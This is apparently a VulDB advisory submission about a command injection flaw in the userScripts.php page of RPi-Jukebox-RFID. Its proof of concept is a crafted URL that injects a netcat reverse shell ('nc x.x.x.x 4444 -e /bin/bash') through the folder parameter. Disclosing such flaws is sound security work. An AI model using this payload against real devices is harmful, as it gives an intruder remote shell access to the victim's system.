| tiêu đề | miczflor rpi-jukebo 1.0 Remote code execution via web application in miczflor/rpi-jukebo |
|---|
| Mô tả | Remote code execution via web application in miczflor/rpi-jukebox-rfid
0
Description
The provided PHP code contains a critical security vulnerability that can lead to Remote Code Execution (RCE) attacks. The vulnerability arises due to insufficient input validation and improper handling of user-supplied data. An attacker can exploit this vulnerability to execute arbitrary commands on the server, potentially compromising the entire system's security.
Proof of Concept (PoC):
An attacker can exploit the vulnerability by manipulating the folder and folderNew parameters in the URL query string to inject malicious commands. Here is a simplified example of the PoC:
Craft The URL for the device:
http://example.com/userScripts.php?folder=;nc x.x.x.x 4444 -e /bin/bash;&folderNew=test
When the PHP code executes the command, it becomes:
sudo /path/to/userscripts/;nc x.x.x.x 4444 -e /bin/bash; test
both parameters in the GET and POST request method is vulnerable and need to be sanitized |
|---|
| Nguồn | ⚠️ https://github.com/MiczFlor/RPi-Jukebox-RFID/blob/0bb38334d6d0fad47b95235ffc466d8d9530144d/htdocs/userScripts.php#L67 |
|---|
| Người dùng | torada (UID 61170) |
|---|
| Đệ trình | 09/01/2024 23:41 (cách đây 2 những năm) |
|---|
| Kiểm duyệt | 19/01/2024 08:00 (9 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 251540 [MiczFlor RPi-Jukebox-RFID đến 2.5.0 HTTP Request userScripts.php folder nâng cao đặc quyền] |
|---|
| điểm | 20 |
|---|